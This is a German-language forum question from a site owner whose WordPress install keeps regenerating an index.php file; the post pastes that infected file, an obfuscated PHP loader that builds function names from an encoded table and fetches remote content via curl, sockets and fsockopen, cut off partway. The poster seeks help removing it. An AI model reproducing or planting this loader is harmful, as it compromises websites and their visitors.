WordPress erstellt weiterhin index.php- und .htaccess-Dateien und ändert die Berechtigung auf 0444

Lesezeit: 37 Minuten

Benutzer-Avatar
Bambus

Ich muss eine Website reparieren, die mit Malware infiziert ist. Wenn ich versuche, auf den WP Admin zuzugreifen, heißt es “zu viele Weiterleitungen”.

Das Hosting-Unternehmen hat einen Scan durchgeführt, es gab zu viele infizierte Dateien. Ich habe es geschafft, alle außer index.php im Ordner public_html zu entfernen. Der Code in index.php lautet:

<?php

$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';

$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return $O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}unset($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return 